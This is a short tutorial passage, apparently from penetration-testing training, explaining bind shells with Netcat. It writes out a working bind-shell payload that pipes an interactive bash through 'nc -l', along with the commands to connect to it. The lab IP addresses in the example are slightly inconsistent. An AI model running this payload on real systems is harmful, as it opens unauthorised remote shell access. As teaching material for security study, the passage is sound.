With a bind shell, the target system has a listener started and awaits a connection from a pentester's system (attack box).

Server - Target starting Netcat listener

nc -lvnp 7777

Client - Attack box connecting to target

nc -nv 10.10.10.10 7777

We can see its functionality by typing a simple message on the client-side and viewing it received on the server-side.

This is not a Shell but just a Netcat TCP session we have established

Establishing a Basic Bind Shell with Netcat

We have shown that we can use Netcat to send text between the client and the server, but this is not a bind shell because we cannot interact with the OS and file system.

Server - Binding a Bash shell to the TCP session /

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.238.111 7777 > /tmp/f

The commands above are considered our payload, and we delivered this payload manually.

Client - Connecting to bind shell on target

nc -nv 10.129.10.10 7777